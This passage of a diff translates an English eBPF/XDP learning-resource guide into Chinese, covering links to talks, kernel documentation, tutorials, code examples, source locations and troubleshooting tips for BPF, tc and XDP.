2017 年 4 月,都存在这样的很多使用案例。 -* [_CETH for XDP_][85]  (Yan Chan and Yunsong Lu, Linux Meetup, Santa Clara, July 2016): - **CETH** stands for Common Ethernet Driver Framework for faster network I/O, a technology initiated by Mellanox. +* [_CETH for XDP_][85] (Yan Chan 和 Yunsong Lu、Linux Meetup、Santa Clara、July 2016): + **CETH**,是由 Mellanox 发起的,为实现更快的网络 I/O 而主张的通用以太网驱动程序架构。 -* [**The VALE switch**][86], another virtual switch that can be used in conjunction with the netmap framework, has [a BPF extension module][87]. +* [**VALE 交换机**][86],另一个虚拟交换机,它可以与 netmap 框架结合,有 [一个 BPF 扩展模块][87]。 -* **Suricata**, an open source intrusion detection system, [seems to rely on eBPF components][88] for its “capture bypass” features: +* **Suricata**,一个开源的入侵检测系统,它的捕获旁通特性 [似乎是依赖于 eBPF 组件][88]: [_The adventures of a Suricate in eBPF land_][89]  (Éric Leblond, netdev 1.2, Tokyo, October 2016) [_eBPF and XDP seen from the eyes of a meerkat_][90]  (Éric Leblond, Kernel Recipes, Paris, September 2017) -* [InKeV: In-Kernel Distributed Network Virtualization for DCN][91] (Z. Ahmed, M. H. Alizai and A. A. Syed, SIGCOMM, August 2016): - **InKeV** is an eBPF-based datapath architecture for virtual networks, targeting data center networks. It was initiated by PLUMgrid, and claims to achieve better performances than OvS-based OpenStack solutions. +* [InKeV: 对于 DCN 的内核中分布式网络虚拟化][91] (Z. Ahmed, M. H. Alizai and A. A. Syed, SIGCOMM, August 2016): + **InKeV** 是一个基于 eBPF 的虚拟网络、目标数据中心网络的数据路径架构。它最初由 PLUMgrid 提出,并且声称相比基于 OvS 的 OpenStack 解决方案可以获得更好的性能。 -* [_**gobpf** - utilizing eBPF from Go_][92]  (Michael Schubert, fosdem17, Brussels, Belgium, February 2017): - A “library to create, load and use eBPF programs from Go” +* [_**gobpf** - 从 Go 中利用 eBPF_][92] (Michael Schubert, fosdem17, Brussels, Belgium, February 2017): + “一个从 Go 中的库,可以去创建、加载和使用 eBPF 程序” -* [**ply**][93] is a small but flexible open source dynamic **tracer** for Linux, with some features similar to the bcc tools, but with a simpler language inspired by awk and dtrace, written by Tobias Waldekranz. +* [**ply**][93] 是为 Linux 实现的一个小的但是非常灵活的开源动态 **跟踪器**,它的一些特性非常类似于 bcc 工具,是受 awk 和 dtrace 启发,但使用一个更简单的语言。它是由 Tobias Waldekranz 写的。 -* If you read my previous article, you might be interested in this talk I gave about [implementing the OpenState interface with eBPF][151], for stateful packet processing, at fosdem17. +* 如果你读过我以前的文章,你可能对我在这篇文章中的讨论感兴趣,[使用 eBPF 实现 OpenState 接口][151],关于包状态处理,在 fosdem17 中。 ![](https://qmonnet.github.io/whirl-offload/img/icons/book.svg) -### Documentation +### 文档 -Once you managed to get a broad idea of what BPF is, you can put aside generic presentations and start diving into the documentation. Below are the most complete documents about BPF specifications and functioning. Pick the one you need and read them carefully! +一旦你对 BPF 是做什么的有一个大体的理解。你可以抛开一般的演示而深入到文档中了。下面是 BPF 的规范和功能的最全面的文档,按你的需要挑一个开始阅读吧! -### About BPF +### 关于 BPF -* The **specification of BPF** (both classic and extended versions) can be found within the documentation of the Linux kernel, and in particular in file[linux/Documentation/networking/filter.txt][94]. The use of BPF as well as its internals are documented there. Also, this is where you can find **information about errors thrown by the verifier** when loading BPF code fails. Can be helpful to troubleshoot obscure error messages. +* **BPF 的规范**(包含 classic 和 extended 版本)可以在 Linux 内核的文档中,和特定的文件 [linux/Documentation/networking/filter.txt][94] 中找到。BPF 使用以及它的内部结构也被记录在那里。此外,当加载 BPF 代码失败时,在这里可以找到 **被校验器抛出的错误信息**,这有助于你排除不明确的错误信息。 -* Also in the kernel tree, there is a document about **frequent Questions & Answers** on eBPF design in file [linux/Documentation/bpf/bpf_design_QA.txt][95]. +* 此外,在内核树中,在 eBPF 那里有一个关于 **常见的问 & 答** 的文档,它在文件 [linux/Documentation/bpf/bpf_design_QA.txt][95] 中。 -* … But the kernel documentation is dense and not especially easy to read. If you look for a simple description of eBPF language, head for [its **summarized description**][96] on the IO Visor GitHub repository instead. +* … 但是,内核文档是非常难懂的,并且非常不容易阅读。如果你只是去查找一个简单的 eBPF 语言的描述,可以去 IO Visor 的 GitHub 仓库,那儿有 [它的 **概括性描述**][96]。 -* By the way, the IO Visor project gathered a lot of **resources about BPF**. Mostly, it is split between[the documentation directory][97] of its bcc repository, and the whole content of [the bpf-docs repository][98], both on GitHub. Note the existence of this excellent [BPF **reference guide**][99] containing a detailed description of BPF C and bcc Python helpers. +* 顺便说一下,IO Visor 项目收集了许多 **关于 BPF 的资源**。大部分,分别在 bcc 仓库的 [文档目录][97] 中,和 [bpf-docs 仓库][98] 的整个内容中,它们都在 GitHub 上。注意,这个非常好的 [BPF **参考指南**][99] 包含一个详细的 BPF C 和 bcc Python 的 helper 的描述。 -* To hack with BPF, there are some essential **Linux manual pages**. The first one is [the `bpf(2)` man page][100] about the `bpf()` **system call**, which is used to manage BPF programs and maps from userspace. It also contains a description of BPF advanced features (program types, maps and so on). The second one is mostly addressed to people wanting to attach BPF programs to tc interface: it is [the `tc-bpf(8)` man page][101], which is a reference for **using BPF with tc**, and includes some example commands and samples of code. +* 想深入到 BPF,那里有一些必要的 **Linux 手册页**。第一个是 [`bpf(2)` man page][100] 关于 `bpf()` **系统调用**,它用于从用户空间去管理 BPF 程序和映射。它也包含一个 BPF 高级特性的描述(程序类型、映射、等等)。第二个是主要去处理希望去附加到 tc 接口的 BPF 程序:它是 [`tc-bpf(8)` man page][101],它是 **使用 BPF 和 tc** 的一个参考,并且包含一些示例命令和参考代码。 -* Jesper Dangaard Brouer initiated an attempt to **update eBPF Linux documentation**, including **the different kinds of maps**. [He has a draft][102] to which contributions are welcome. Once ready, this document should be merged into the man pages and into kernel documentation. +* Jesper Dangaard Brouer 发起了一个 **更新 eBPF Linux 文档** 的尝试,包含 **不同的映射**。[他有一个草案][102],欢迎去贡献。一旦完成,这个文档将被合并进 man 页面并且进入到内核文档。 -* The Cilium project also has an excellent [**BPF and XDP Reference Guide**][103], written by core eBPF developers, that should prove immensely useful to any eBPF developer. +* Cilium 项目也有一个非常好的 [**BPF 和 XDP 参考指南**][103],它是由核心的 eBPF 开发者写的,它被证明对于 eBPF 开发者是极其有用的。 -* David Miller has sent several enlightening emails about eBPF/XDP internals on the [xdp-newbies][152]mailing list. I could not find a link that gathers them at a single place, so here is a list: - * [bpf.h and you…][50] +* David Miller 在 [xdp-newbies][152] 邮件列表中发了几封关于 eBPF/XDP 内部结构的富有启发性的电子邮件。我找不到一个单独的地方收集它们的链接,因此,这里是一个列表: + + * [bpf.h 和你 …][50] * [Contextually speaking…][51] - * [BPF Verifier Overview][52] + * [BPF 校验器概述][52] - The last one is possibly the best existing summary about the verifier at this date. + 最后一个可能是目前来说关于校验器的最佳的总结。 -* Ferris Ellis started [a **blog post series about eBPF**][104]. As I write this paragraph, the first article is out, with some historical background and future expectations for eBPF. Next posts should be more technical, and look promising. +* Ferris Ellis 发布的 [一个关于 **eBPF 的系列博客文章**][104]。作为我写的这个短文,第一篇文章是关于 eBPF 的历史背景和未来期望。接下来的文章将更多的是技术方面,和前景展望。 -* [A **list of BPF features per kernel version**][153] is available in bcc repository. Useful is you want to know the minimal kernel version that is required to run a given feature. I contributed and added the links to the commits that introduced each feature, so you can also easily access the commit logs from there. +* [一个 **每个内核版本的 BPF 特性列表**][153] 在 bcc 仓库中可以找到。如果你想去知道运行一个给定的特性所要求的最小的内核版本,它是非常有用的。我贡献和添加了链接到提交中,它介绍了每个特性,因此,你也可以从那里很容易地去访问提交历史。 -### About tc +### 关于 tc -When using BPF for networking purposes in conjunction with tc, the Linux tool for **t**raffic **c**ontrol, one may wish to gather information about tc’s generic functioning. Here are a couple of resources about it. +当为了网络目的使用 BPF 与 tc 进行结合时,Linux 流量控制(**t**raffic **c**ontrol)工具,它可用于去采集关于 tc 的可用功能的信息。这里有几个关于它的资源。 -* It is difficult to find simple tutorials about **QoS on Linux**. The two links I have are long and quite dense, but if you can find the time to read it you will learn nearly everything there is to know about tc (nothing about BPF, though). There they are:  [_Traffic Control HOWTO_  (Martin A. Brown, 2006)][105], and the  [_Linux Advanced Routing & Traffic Control HOWTO_  (“LARTC”) (Bert Hubert & al., 2002)][106]. +* 找到关于 **Linux 上 QoS** 的简单教程是很困难的。这里有两个链接,它们很长而且很难懂,但是,如果你可以抽时间去阅读它,你将学习到几乎关于 tc 的任何东西(虽然,关于 BPF 它什么也没有)。它们在这里:[_怎么去实现流量控制_  (Martin A. Brown, 2006)][105],和 [_怎么去实现 Linux 的高级路由 & 流量控制_  (“LARTC”) (Bert Hubert & al., 2002)][106]。 -* **tc manual pages** may not be up-to-date on your system, since several of them have been added lately. If you cannot find the documentation for a particular queuing discipline (qdisc), class or filter, it may be worth checking the latest [manual pages for tc components][107]. +* 在你的系统上的 **tc 手册页面** 并不是最新日期的,因为它们中的几个最近已经增加了。如果你没有找到关于特定的队列规则、分类或者过滤器的文档,它可能在最新的 [tc 组件的手册页面][107] 中。 -* Some additional material can be found within the files of iproute2 package itself: the package contains [some documentation][108], including some files that helped me understand better [the functioning of **tc’s actions**][109]. - **Edit:** While still available from the Git history, these files have been deleted from iproute2 in October 2017. +* 一些额外的材料可以在 iproute2 包自已的文件中找到:这个包中有 [一些文档][108],包括一些文件,它可以帮你去理解 [**tc 的 action** 的功能][109]。 + **注意:** 这些文件在 2017 年 10 月 已经从 iproute2 中删除,然而,从 Git 历史中却一直可用。 -* Not exactly documentation: there was [a workshop about several tc features][110] (including filtering, BPF, tc offload, …) organized by Jamal Hadi Salim during the netdev 1.2 conference (October 2016). +* 非精确资料:这里是 [一个关于 tc 的几个特性的研讨会][110](包含过滤、BPF、tc offload、…) 由 Jamal Hadi Salim 在 netdev 1.2 会议上组织的(October 2016)。 -* Bonus information—If you use `tc` a lot, here are some good news: I [wrote a bash completion function][111] for this tool, and it should be shipped with package iproute2 coming with kernel version 4.6 and higher! +* 额外信息 — 如果你使用 `tc` 较多,这里有一些好消息:我用这个工具 [写了一个 bash 完整的功能][111],并且它被包 iproute2 带到内核版本 4.6 和更高版中! -### About XDP +### 关于 XDP -* Some [work-in-progress documentation (including specifications)][112] for XDP started by Jesper Dangaard Brouer, but meant to be a collaborative work. Under progress (September 2016): you should expect it to change, and maybe to be moved at some point (Jesper [called for contribution][113], if you feel like improving it). +* 对于 XDP 的一些 [进展中的文档(包括规范)][112] 已经由 Jesper Dangaard Brouer 启动,并且意味着将成为一个合作的工作。正在推进(2016 年 9 月):你期望它去改变,并且或许在一些节点上移动(Jesper [称为贡献][113],如果你想去改善它)。 -* The [BPF and XDP Reference Guide][114] from Cilium project… Well, the name says it all. +* 自来 Cilium 项目的 [BPF 和 XDP 参考指南][114] … 好吧,这个名字已经说明了一切。 -### About P4 and BPF +### 关于 P4 和 BPF -[P4][159] is a language used to specify the behavior of a switch. It can be compiled for a number of hardware or software targets. As you may have guessed, one of these targets is BPF… The support is only partial: some P4 features cannot be translated towards BPF, and in a similar way there are things that BPF can do but that would not be possible to express with P4\. Anyway, the documentation related to **P4 use with BPF** [used to be hidden in bcc repository][160]. This changed with P4_16 version, the p4c reference compiler including [a backend for eBPF][161]. +[P4][159] 是一个用于指定交换机行为的语言。它可以被编译为许多种目标硬件或软件。因此,你可能猜到了,这些目标中的一个就是 BPF … 仅部分支持的:一些 P4 特性并不能被转化到 BPF 中,并且,用类似的方法,BPF 可以做的事情,而使用 P4 却不能表达出现。不过,**P4 与 BPF 使用** 的相关文档,[用于去隐藏在 bcc 仓库中][160]。这个改变在 P4_16 版本中,p4c 引用的编辑器包含 [一个 eBPF 后端][161]。 ![](https://qmonnet.github.io/whirl-offload/img/icons/flask.svg) -### Tutorials +### 教程 -Brendan Gregg has produced excellent **tutorials** intended for people who want to **use bcc tools** for tracing and monitoring events in the kernel. [The first tutorial about using bcc itself][162] comes with eleven steps (as of today) to understand how to use the existing tools, while [the one **intended for Python developers**][163] focuses on developing new tools, across seventeen “lessons”. +Brendan Gregg 为想去 **使用 bcc 工具** 跟踪和监视内核中的事件的人制作了一个非常好的 **教程**。[第一个教程是关于如何使用 bcc 工具][162],它总共有十一步,教你去理解怎么去使用已有的工具,而 [**针对 Python 开发者** 的一个目标][163] 是专注于开发新工具,它总共有十七节 “课程”。 -Sasha Goldshtein also has some  [_**Linux Tracing Workshops Materials**_][164]  involving the use of several BPF tools for tracing. +Sasha Goldshtein 也有一些 [_**Linux 跟踪研究材料**_][164] 涉及到使用几个 BPF 去进行跟踪。 -Another post by Jean-Tiare Le Bigot provides a detailed (and instructive!) example of [using perf and eBPF to setup a low-level tracer][165] for ping requests and replies +作者为 Jean-Tiare Le Bigot 的文章为 ping 请求和回复,提供了一个详细的(和有指导意义的)[使用 perf 和 eBPF 去设置一个低级的跟踪器][165] 的示例。 -Few tutorials exist for network-related eBPF use cases. There are some interesting documents, including an  _eBPF Offload Starting Guide_ , on the [Open NFP][166] platform operated by Netronome. Other than these, the talk from Jesper,  [_XDP for the Rest of Us_][167] , is probably one of the best ways to get started with XDP. +对于网络相关的 eBPF 使用案例也有几个教程。那里有一些有趣的文档,包含一个 _eBPF Offload 入门指南_,由 Netronome 在 [Open NFP][166] 平台上操作的。其它的那些,来自 Jesper 的演讲,[_XDP 能为其它人做什么_][167],可能是 XDP 入门的最好的方法之一。 ![](https://qmonnet.github.io/whirl-offload/img/icons/gears.svg) -### Examples +### 示例 -It is always nice to have examples. To see how things really work. But BPF program samples are scattered across several projects, so I listed all the ones I know of. The examples do not always use the same helpers (for instance, tc and bcc both have their own set of helpers to make it easier to write BPF programs in C language). +有示例是非常好的。看看它们是如何工作的。但是 BPF 程序示例是分散在几个项目中的,因此,我列出了我所知道的所有的示例。示例并不是使用相同的 helper(例如,tc 和 bcc 都有一套它们自己的 helper,使它可以很容易地去用 C 语言写 BPF 程序) -### From the kernel +### 来自内核的示例 -The kernel contains examples for most types of program: filters to bind to sockets or to tc interfaces, event tracing/monitoring, and even XDP. You can find these examples under the [linux/samples/bpf/][168]directory. +主要的程序类型都包含在内核的示例中:过滤器绑定到套接字或者到 tc 接口、事件跟踪/监视、甚至是 XDP。你可以在 [linux/samples/bpf/][168] 目录中找到这些示例。 -Also do not forget to have a look to the logs related to the (git) commits that introduced a particular feature, they may contain some detailed example of the feature. +也不要忘记去看一下 git 相关的提交历史,它们有一些指定的特性的介绍,它们也包含一些特性的详细的示例。 -### From package iproute2 +### 来自包 iproute2 的示例 -The iproute2 package provide several examples as well. They are obviously oriented towards network programming, since the programs are to be attached to tc ingress or egress interfaces. The examples dwell under the [iproute2/examples/bpf/][169] directory. +iproute2 包也提供了几个示例。它们都很明显地偏向网络编程,因此,这个程序是附加到 tc ingress 或者 egress 接口上。这些示例在 [iproute2/examples/bpf/][169] 目录中。 -### From bcc set of tools +### 来自 bcc 工具集的示例 -Many examples are [provided with bcc][170]: +许多示例都 [与 bcc 一起提供][170]: -* Some are networking example programs, under the associated directory. They include socket filters, tc filters, and a XDP program. +* 一些网络编程的示例在关联的目录下面。它们包括套接字过滤器、tc 过滤器、和一个 XDP 程序。 -* The `tracing` directory include a lot of example **tracing programs**. The tutorials mentioned earlier are based on these. These programs cover a wide range of event monitoring functions, and some of them are production-oriented. Note that on certain Linux distributions (at least for Debian, Ubuntu, Fedora, Arch Linux), these programs have been [packaged][115] and can be “easily” installed by typing e.g. `# apt install bcc-tools`, but as of this writing (and except for Arch Linux), this first requires to set up IO Visor’s own package repository. +* `tracing` 目录包含许多 **跟踪编程** 的示例。前面的教程中提到的都在那里。那些程序涉及了事件跟踪的很大的一个范围,并且,它们中的一些是面向生产系统的。注意,某些 Linux 分发版(至少是 Debian、Ubuntu、Fedora、Arch Linux)、这些程序已经被 [打包了][115] 并且可以很 “容易地” 通过比如 `# apt install bcc-tools` 进行安装。但是在写这篇文章的时候(除了 Arch Linux),第一个要求是去安装 IO Visor 的包仓库。 -* There are also some examples **using Lua** as a different BPF back-end (that is, BPF programs are written with Lua instead of a subset of C, allowing to use the same language for front-end and back-end), in the third directory. +* 那里也有 **使用 Lua** 作为一个不同的 BPF 后端(那是因为 BPF 程序是用 Lua 写的,它是 C 语言的一个子集,它允许为前端和后端使用相同的语言)的一些示例,它在第三个目录中。 -### Manual pages +### 手册页面 -While bcc is generally the easiest way to inject and run a BPF program in the kernel, attaching programs to tc interfaces can also be performed by the `tc` tool itself. So if you intend to **use BPF with tc**, you can find some example invocations in the [`tc-bpf(8)` manual page][171]. +虽然 bcc 一般可以用很容易的方式在内核中去注入和运行一个 BPF 程序,通过 `tc` 工具去将程序附加到 tc 接口也可以被执行。因此,如果你打算将 **BPF 与 tc 一起使用**,你可以在 [`tc-bpf(8)` 手册页面][171] 中找到一些调用示例。 ![](https://qmonnet.github.io/whirl-offload/img/icons/srcfile.svg) -### The code +### 代码 -Sometimes, BPF documentation or examples are not enough, and you may have no other solution that to display the code in your favorite text editor (which should be Vim of course) and to read it. Or you may want to hack into the code so as to patch or add features to the machine. So here are a few pointers to the relevant files, finding the functions you want is up to you! +有时候,BPF 文档或者示例并不足够多,而且你可能没有其它的方式在你喜欢的文本编辑器(它当然应该是 Vim)中去显示代码并去阅读它。或者,你可能深入到代码中想去做一个补丁程序或者为机器增加一些新特性。因此,这里对有关的文件的几个建议,找到你想要的功能取决于你自己! -### BPF code in the kernel +### 在内核中的 BPF 代码 -* The file [linux/include/linux/bpf.h][116] and its counterpart [linux/include/uapi/bpf.h][117] contain **definitions** related to eBPF, to be used respectively in the kernel and to interface with userspace programs. +* 文件 [linux/include/linux/bpf.h][116] 和它的副本 [linux/include/uapi/bpf.h][117] 包含有关 eBPF 的 **定义**,它分别被内核中和用户空间程序的接口使用。 -* On the same pattern, files [linux/include/linux/filter.h][118] and [linux/include/uapi/filter.h][119] contain information used to **run the BPF programs**. +* 相同的方式,文件 [linux/include/linux/filter.h][118] 和 [linux/include/uapi/filter.h][119] 包含的信息被 **运行的 BPF 程序** 使用。 -* The **main pieces of code** related to BPF are under [linux/kernel/bpf/][120] directory. **The different operations permitted by the system call**, such as program loading or map management, are implemented in file `syscall.c`, while `core.c` contains the **interpreter**. The other files have self-explanatory names: `verifier.c` contains the **verifier** (no kidding), `arraymap.c` the code used to interact with **maps** of type array, and so on. +* BPF 相关的 **主要的代码片断** 在 [linux/kernel/bpf/][120] 目录下面。**被系统以不同的操作许可调用** 比如,程序加载或者映射管理是在文件 `syscall.c` 中实现,虽然 `core.c` 包含在 **解析器** 中。其它的文件有明显的命名:`verifier.c` 包含在 **校验器** 中(不是开玩笑的),`arraymap.c` 的代码用于与阵列类型的 **映射** 去互动,等等。 -* The **helpers**, as well as several functions related to networking (with tc, XDP…) and available to the user, are implemented in [linux/net/core/filter.c][121]. It also contains the code to migrate cBPF bytecode to eBPF (since all cBPF programs are now translated to eBPF in the kernel before being run). +* **helpers**,以及几个网络(与 tc、XDP 一起)和用户可用的相关功能是实现在 [linux/net/core/filter.c][121] 中。它也包含代码去移植 cBPF 字节码到 eBPF 中(因为在运行之前,内核中的所有的 cBPF 程序被转换成 eBPF) -* The **JIT compilers** are under the directory of their respective architectures, such as file[linux/arch/x86/net/bpf_jit_comp.c][122] for x86. +* **JIT 编译器** 在它们各自的架构目录下面,比如,x86 架构的在 [linux/arch/x86/net/bpf_jit_comp.c][122] 中。 -* You will find the code related to **the BPF components of tc** in the [linux/net/sched/][123] directory, and in particular in files `act_bpf.c` (action) and `cls_bpf.c` (filter). +* 在 [linux/net/sched/][123] 目录下,你可以找到 **tc 的 BPF 组件** 相关的代码,尤其是在文件 `act_bpf.c` (action)和 `cls_bpf.c`(filter)中。 -* I have not hacked with **event tracing** in BPF, so I do not really know about the hooks for such programs. There is some stuff in [linux/kernel/trace/bpf_trace.c][124]. If you are interested in this and want to know more, you may dig on the side of Brendan Gregg’s presentations or blog posts. +* 我并没有在 BPF 上深入到 **事件跟踪** 中,因此,我并不真正了解这些程序的钩子。在 [linux/kernel/trace/bpf_trace.c][124] 那里有一些东西。如果你对它感 兴趣,并且想去了解更多,你可以在 Brendan Gregg 的演示或者博客文章上去深入挖掘。 -* Nor have I used **seccomp-BPF**. But the code is in [linux/kernel/seccomp.c][125], and some example use cases can be found in [linux/tools/testing/selftests/seccomp/seccomp_bpf.c][126]. +* 我也没有使用过 **seccomp-BPF**。但它的代码在 [linux/kernel/seccomp.c][125],并且可以在 [linux/tools/testing/selftests/seccomp/seccomp_bpf.c][126] 中找到一些它的使用示例。 -### XDP hooks code +### XDP 钩子代码 -Once loaded into the in-kernel BPF virtual machine, **XDP** programs are hooked from userspace into the kernel network path thanks to a Netlink command. On reception, the function `dev_change_xdp_fd()` in file [linux/net/core/dev.c][172] is called and sets a XDP hook. Such hooks are located in the drivers of supported NICs. For example, the mlx4 driver used for some Mellanox hardware has hooks implemented in files under the [drivers/net/ethernet/mellanox/mlx4/][173] directory. File en_netdev.c receives Netlink commands and calls `mlx4_xdp_set()`, which in turns calls for instance `mlx4_en_process_rx_cq()` (for the RX side) implemented in file en_rx.c. +一旦将 BPF 虚拟机加载进内核,由一个 Netlink 命令将 **XDP** 程序从用户空间钩入到内核网络路径中。接收它的是在 [linux/net/core/dev.c][172] 文件中的被调用的 `dev_change_xdp_fd()` 函数,并且由它设置一个 XDP 钩子。比如,钩子位于在 NICs 支持的驱动中。例如,为一些 Mellanox 硬件使用的 mlx4 驱动的钩子实现在 [drivers/net/ethernet/mellanox/mlx4/][173] 目录下的文件中。文件 en_netdev.c 接收 Netlink 命令并调用 `mlx4_xdp_set()`,它再被在文件 en_rx.c 实现的实例 `mlx4_en_process_rx_cq()` 调用(对于 RX 侧)。 -### BPF logic in bcc +### 在 bcc 中的 BPF 逻辑 -One can find the code for the **bcc** set of tools [on the bcc GitHub repository][174]. The **Python code**, including the `BPF` class, is initiated in file [bcc/src/python/bcc/__init__.py][175]. But most of the interesting stuff—to my opinion—such as loading the BPF program into the kernel, happens [in the libbcc **C library**][176]. +[在 bcc 的 GitHub 仓库][174] 上找到的 **bcc** 工具集的其中一个代码。**Python 代码**,包含在 `BPF` 类中,最初它在文件 [bcc/src/python/bcc/__init__.py][175] 中。但是许多感兴趣的东西 — 我的意见是 — 比如,加载 BPF 程序到内核中,碰巧在 [libbcc 的 **C 库**][176]中。 -### Code to manage BPF with tc +### 使用 tc 去管理 BPF 的代码 -The code related to BPF **in tc** comes with the iproute2 package, of course. Some of it is under the[iproute2/tc/][177] directory. The files f_bpf.c and m_bpf.c (and e_bpf.c) are used respectively to handle BPF filters and actions (and tc `exec` command, whatever this may be). File q_clsact.c defines the `clsact` qdisc especially created for BPF. But **most of the BPF userspace logic** is implemented in[iproute2/lib/bpf.c][178] library, so this is probably where you should head to if you want to mess up with BPF and tc (it was moved from file iproute2/tc/tc_bpf.c, where you may find the same code in older versions of the package). +**在 tc** 中与 iproute2 包中一起带来的与 BPF 相关的代码。其中的一些在 [iproute2/tc/][177] 目录中。文件 f_bpf.c 和 m_bpf.c(和 e_bpf.c)是各自用于处理 BPF 的过滤器和动作的(和tc `exec` 命令,或许什么命令都可以)。文件 q_clsact.c 定义了 `clsact`,qdisc 是为 BPF 特别创建的。但是,**大多数的 BPF 用户空间逻辑** 是在 [iproute2/lib/bpf.c][178] 库中实现的,因此,如果你想去使用 BPF 和 tc,这里可能是会将你搞混乱的地方(它是从文件 iproute2/tc/tc_bpf.c 中来的,你也可以在旧版本的包中找到代码相同的地方)。 -### BPF utilities +### BPF 实用工具 -The kernel also ships the sources of three tools (`bpf_asm.c`, `bpf_dbg.c`, `bpf_jit_disasm.c`) related to BPF, under the [linux/tools/net/][179] or [linux/tools/bpf/][180] directory depending on your version: +内核中也带有 BPF 相关的三个工具的源代码(`bpf_asm.c`, `bpf_dbg.c`, `bpf_jit_disasm.c`)、根据你的版本不同,在 [linux/tools/net/][179] 或者 [linux/tools/bpf/][180] 目录下面: -* `bpf_asm` is a minimal cBPF assembler. +* `bpf_asm` 是一个极小的汇编程序。 -* `bpf_dbg` is a small debugger for cBPF programs. +* `bpf_dbg` 是一个很小的 cBPF 程序调试器。 -* `bpf_jit_disasm` is generic for both BPF flavors and could be highly useful for JIT debugging. +* `bpf_jit_disasm` 对于两种 BPF 都是通用的,并且对于 JIT 调试来说非常有用。 -* `bpftool` is a generic utility written by Jakub Kicinski, and that can be used to interact with eBPF programs and maps from userspace, for example to show, dump, pin programs, or to show, create, pin, update, delete maps. +* `bpftool` 是由 Jakub Kicinski 写的通用工具,并且它可以与 eBPF 程序和来自用户空间的映射进行交互,例如,去展示、转储、pin 程序、或者去展示、创建、pin、更新、删除映射。 -Read the comments at the top of the source files to get an overview of their usage. +阅读在源文件顶部的注释可以得到一个它们使用方法的概述。 -### Other interesting chunks +### 其它感兴趣的 chunks -If you are interested the use of less common languages with BPF, bcc contains [a **P4 compiler** for BPF targets][181] as well as [a **Lua front-end**][182] that can be used as alternatives to the C subset and (in the case of Lua) to the Python tools. +如果你对关于 BPF 的不常见的语言的使用感兴趣,bcc 包含 [一个为 BPF 目标的 **P4 编译器**][181]以及 [一个 **Lua 前端**][182],它可以被使用,它以代替 C 的一个子集,并且(在 Lua 的案例中)可以用于 Python 工具。 -### LLVM backend +### LLVM 后端 -The BPF backend used by clang / LLVM for compiling C into eBPF was added to the LLVM sources in[this commit][183] (and can also be accessed on [the GitHub mirror][184]). +在 [这个提交][183] 中,clang / LLVM 用于将 C 编译成 BPF 后端,将它添加到 LLVM 源(也可以在 [the GitHub mirror][184] 上访问)。 -### Running in userspace +### 在用户空间中运行 -As far as I know there are at least two eBPF userspace implementations. The first one, [uBPF][185], is written in C. It contains an interpreter, a JIT compiler for x86_64 architecture, an assembler and a disassembler. +到目前为止,我知道那里有至少两种 eBPF 用户空间实现。第一个是 [uBPF][185],它是用 C 写的。它包含一个解析器、一个 x86_64 架构的 JIT 编译器、一个汇编器和一个反汇编器。 -The code of uBPF seems to have been reused to produce a [generic implementation][186], that claims to support FreeBSD kernel, FreeBSD userspace, Linux kernel, Linux userspace and MacOSX userspace. It is used for the [BPF extension module for VALE switch][187]. +uBPF 的代码似乎被重用了,去产生了一个 [通用实现][186],claims 支持 FreeBSD 内核、FreeBSD 用户空间、Linux 内核、Linux 用户空间和 Mac OSX 用户空间。它被 [VALE 交换机的 BPF 扩展模块][187]使用。 -The other userspace implementation is my own work: [rbpf][188], based on uBPF, but written in Rust. The interpreter and JIT-compiler work (both under Linux, only the interpreter for MacOSX and Windows), there may be more in the future. +其它用户空间的实现是我做的:[rbpf][188],基于 uBPF,但是用 Rust 写的。写了解析器和 JIT 编译器 (Linux 下两个都有,Mac OSX 和 Windows 下仅有解析器),以后可能会有更多。 -### Commit logs +### 提交日志 -As stated earlier, do not hesitate to have a look at the commit log that introduced a particular BPF feature if you want to have more information about it. You can search the logs in many places, such as on [git.kernel.org][189], [on GitHub][190], or on your local repository if you have cloned it. If you are not familiar with git, try things like `git blame ` to see what commit introduced a particular line of code, then `git show ` to have details (or search by keyword in `git log` results, but this may be tedious). See also [the list of eBPF features per kernel version][191] on bcc repository, that links to relevant commits. +正如前面所说的,如果你希望得到更多的关于它的信息,不要犹豫,去看一些提交日志,它介绍了一些特定的 BPF 特性。你可以在许多地方搜索日志,比如,在 [git.kernel.org][189]、[在 GitHub 上][190]、或者如果你克隆过它还有你的本地仓库中。如果你不熟悉 git,你可以尝试像这些去做 `git blame ` 去看看介绍特定代码行的提交内容,然后,`git show ` 去看详细情况(或者在 `git log` 的结果中按关键字搜索,但是这样做通常比较单调乏味)也可以看在 bcc 仓库中的 [按内核版本区分的 eBPF 特性列表][191],它链接到相关的提交上。 ![](https://qmonnet.github.io/whirl-offload/img/icons/wand.svg) -### Troubleshooting +### 排错 -The enthusiasm about eBPF is quite recent, and so far I have not found a lot of resources intending to help with troubleshooting. So here are the few I have, augmented with my own recollection of pitfalls encountered while working with BPF. +对 eBPF 的狂热是最近的事情,因此,到目前为止我还找不到许多关于怎么去排错的资源。所以这里只有几个,在使用 BPF 进行工作的时候,我对自己遇到的问题进行了记录。 -### Errors at compilation time +### 编译时的错误 -* Make sure you have a recent enough version of the Linux kernel (see also [this document][127]). +* 确保你有一个最新的 Linux 内核版本(也可以看 [这个文档][127])。 -* If you compiled the kernel yourself: make sure you installed correctly all components, including kernel image, headers and libc. +* 如果你自己编译内核:确保你安装了所有正确的组件,包括内核镜像、头文件和 libc。 -* When using the `bcc` shell function provided by `tc-bpf` man page (to compile C code into BPF): I once had to add includes to the header for the clang call: +* 当使用 `tc-bpf`(用于去编译 C 代码到 BPF 中)的 man 页面提供的 `bcc` shell 函数时:我只是添加包含 clang 调用的头部: ``` __bcc() { @@ -463,55 +463,55 @@ The enthusiasm about eBPF is quite recent, and so far I have not found a lot of (seems fixed as of today). -* For other problems with `bcc`, do not forget to have a look at [the FAQ][128] of the tool set. +* 对于使用 `bcc` 的其它问题,不要忘了去看一看这个工具集的 [答疑][128]。 -* If you downloaded the examples from the iproute2 package in a version that does not exactly match your kernel, some errors can be triggered by the headers included in the files. The example snippets indeed assume that the same version of iproute2 package and kernel headers are installed on the system. If this is not the case, download the correct version of iproute2, or edit the path of included files in the examples to point to the headers included in iproute2 (some problems may or may not occur at runtime, depending on the features in use). +* 如果你从一个并不精确匹配你的内核版本的 iproute2 包中下载了示例,可能会通过在文件中包含的头文件触发一些错误。这些示例片断都假设安装在你的系统中内核的头文件与 iproute2 包是相同版本的。如果不是这种情况,下载正确的 iproute2 版本,或者编辑示例中包含的文件的路径,指向到 iproute2 中包含的头文件上(在运行时一些问题可能或者不可能发生,取决于你使用的特性)。 -### Errors at load and run time +### 在加载和运行时的错误 -* To load a program with tc, make sure you use a tc binary coming 